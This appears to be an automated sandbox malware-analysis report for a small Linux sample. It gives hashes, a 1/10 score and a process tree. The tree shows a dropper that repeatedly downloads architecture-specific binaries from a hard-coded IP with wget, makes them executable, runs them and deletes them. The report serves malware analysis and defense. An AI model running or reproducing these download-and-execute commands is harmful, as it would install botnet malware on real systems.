Analysis

  • max time kernel
    36s
  • max time network
    129s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240418-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240418-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    05/05/2024, 02:27

General

  • Target

    15917961bac6063481040fcc4af85061_JaffaCakes118

  • Size

    1KB

  • MD5

    15917961bac6063481040fcc4af85061

  • SHA1

    cbd80d0978a0aaff4116d680da328cf5fd1153e9

  • SHA256

    f7e374f479296d08a98d549c93433ec13ddeaf6835ea9d76d0bf33c23ff24682

  • SHA512

    a284a0a6483d65b46cef2fd129fc68b40feb2a1bef82cb89ea12027462c23a0dc3ee87e48f09aa7302dc96bcbdf1b4f8bacab82ba7d0507f86e660f03d1b4935

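Score
1/10

Note: the Malware Config and Signatures sections of this report are empty, which likely explains the low score. The process tree below still shows the same sequence repeated for many CPU architectures against a single host: download with wget, chmod +x, execute, then rm -rf. The score alone should therefore not be read as evidence that the sample is benign.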

Malware Config

Signatures

Processes

  • /tmp/15917961bac6063481040fcc4af85061_JaffaCakes118
    /tmp/15917961bac6063481040fcc4af85061_JaffaCakes118
    1⤵
      PID:1533
      • /usr/bin/wget
        wget http://45.95.168.138/mips
        2⤵
          PID:1534
        • /bin/chmod
          chmod +x mips
          2⤵
            PID:1538
          • /tmp/mips
            ./mips
            2⤵
              PID:1539
            • /bin/rm
              rm -rf mips
              2⤵
                PID:1540
              • /usr/bin/wget
                wget http://45.95.168.138/mipsel
                2⤵
                  PID:1541
                • /bin/chmod
                  chmod +x mipsel
                  2⤵
                    PID:1542
                  • /tmp/mipsel
                    ./mipsel
                    2⤵
                      PID:1543
                    • /bin/rm
                      rm -rf mipsel
                      2⤵
                        PID:1544
                      • /usr/bin/wget
                        wget http://45.95.168.138/sh4
                        2⤵
                          PID:1545
                        • /bin/chmod
                          chmod +x sh4
                          2⤵
                            PID:1546
                          • /tmp/sh4
                            ./sh4
                            2⤵
                              PID:1547
                            • /bin/rm
                              rm -rf sh4
                              2⤵
                                PID:1548
                              • /usr/bin/wget
                                wget http://45.95.168.138/x86
                                2⤵
                                  PID:1549
                                • /bin/chmod
                                  chmod +x x86
                                  2⤵
                                    PID:1550
                                  • /tmp/x86
                                    ./x86
                                    2⤵
                                      PID:1551
                                    • /bin/rm
                                      rm -rf x86
                                      2⤵
                                        PID:1552
                                      • /usr/bin/wget
                                        wget http://45.95.168.138/armv6l
                                        2⤵
                                          PID:1553
                                        • /bin/chmod
                                          chmod +x armv6l
                                          2⤵
                                            PID:1554
                                          • /tmp/armv6l
                                            ./armv6l
                                            2⤵
                                              PID:1555
                                            • /bin/rm
                                              rm -rf armv6l
                                              2⤵
                                                PID:1556
                                              • /usr/bin/wget
                                                wget http://45.95.168.138/i686
                                                2⤵
                                                  PID:1557
                                                • /bin/chmod
                                                  chmod +x i686
                                                  2⤵
                                                    PID:1558
                                                  • /tmp/i686
                                                    ./i686
                                                    2⤵
                                                      PID:1559
                                                    • /bin/rm
                                                      rm -rf i686
                                                      2⤵
                                                        PID:1560
                                                      • /usr/bin/wget
                                                        wget http://45.95.168.138/powerpc
                                                        2⤵
                                                          PID:1561
                                                        • /bin/chmod
                                                          chmod +x powerpc
                                                          2⤵
                                                            PID:1562
                                                          • /tmp/powerpc
                                                            ./powerpc
                                                            2⤵
                                                              PID:1563
                                                            • /bin/rm
                                                              rm -rf powerpc
                                                              2⤵
                                                                PID:1564
                                                              • /usr/bin/wget
                                                                wget http://45.95.168.138/i586
                                                                2⤵
                                                                  PID:1565
                                                                • /bin/chmod
                                                                  chmod +x i586
                                                                  2⤵
                                                                    PID:1566
                                                                  • /tmp/i586
                                                                    ./i586
                                                                    2⤵
                                                                      PID:1567
                                                                    • /bin/rm
                                                                      rm -rf i586
                                                                      2⤵
                                                                        PID:1568
                                                                      • /usr/bin/wget
                                                                        wget http://45.95.168.138/m68k
                                                                        2⤵
                                                                          PID:1569
                                                                        • /bin/chmod
                                                                          chmod +x m68k
                                                                          2⤵
                                                                            PID:1570
                                                                          • /tmp/m68k
                                                                            ./m68k
                                                                            2⤵
                                                                              PID:1571
                                                                            • /bin/rm
                                                                              rm -rf m68k
                                                                              2⤵
                                                                                PID:1572
                                                                              • /usr/bin/wget
                                                                                wget http://45.95.168.138/sparc
                                                                                2⤵
                                                                                  PID:1573
                                                                                • /bin/chmod
                                                                                  chmod +x sparc
                                                                                  2⤵
                                                                                    PID:1576
                                                                                  • /tmp/sparc
                                                                                    ./sparc
                                                                                    2⤵
                                                                                      PID:1577
                                                                                    • /bin/rm
                                                                                      rm -rf sparc
                                                                                      2⤵
                                                                                        PID:1578
                                                                                      • /usr/bin/wget
                                                                                        wget http://45.95.168.138/armv4l
                                                                                        2⤵
                                                                                          PID:1579
                                                                                        • /bin/chmod
                                                                                          chmod +x armv4l
                                                                                          2⤵
                                                                                            PID:1580
                                                                                          • /tmp/armv4l
                                                                                            ./armv4l
                                                                                            2⤵
                                                                                              PID:1581
                                                                                            • /bin/rm
                                                                                              rm -rf armv4l
                                                                                              2⤵
                                                                                                PID:1582
                                                                                              • /usr/bin/wget
                                                                                                wget http://45.95.168.138/armv5l
                                                                                                2⤵
                                                                                                  PID:1583
                                                                                                • /bin/chmod
                                                                                                  chmod +x armv5l
                                                                                                  2⤵
                                                                                                    PID:1584
                                                                                                  • /tmp/armv5l
                                                                                                    ./armv5l
                                                                                                    2⤵
                                                                                                      PID:1585
                                                                                                    • /bin/rm
                                                                                                      rm -rf armv5l
                                                                                                      2⤵
                                                                                                        PID:1586

                                                                                                    Network

                                                                                                          MITRE ATT&CK Matrix


                                                                                                          Downloads